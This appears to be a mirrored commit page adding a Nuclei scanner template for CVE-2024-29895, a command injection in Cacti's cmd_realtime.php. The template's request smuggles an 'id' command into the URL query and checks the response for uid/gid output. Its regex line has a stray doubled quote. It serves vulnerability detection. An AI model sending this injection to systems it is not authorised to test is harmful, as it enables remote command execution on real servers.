daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2024-29895.yaml

patch-4
pussycat0x 2024-05-16 17:15:45 +05:30 committed by GitHub
parent ebfd00e083
commit 62ad67b550
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 37 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
http/cves/2024/CVE-2024-29895.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2024-29895
info:
name: Test Injection in Cacti cmd_realtime.php
author: pussycat0x
severity: critical
description: Checks for injection vulnerabilities in cmd_realtime.php on Cacti instances.
reference:
- https://www.example.com/cve-xxxx-xxxx
- https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119
- https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d
- https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc
- https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-29895
cwe-id: CWE-77
epss-score: 0.00045
epss-percentile: 0.14626
tags: cacti,injection
http:
- method: GET
path:
- "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&id=1+1+1"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- ""uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
part: body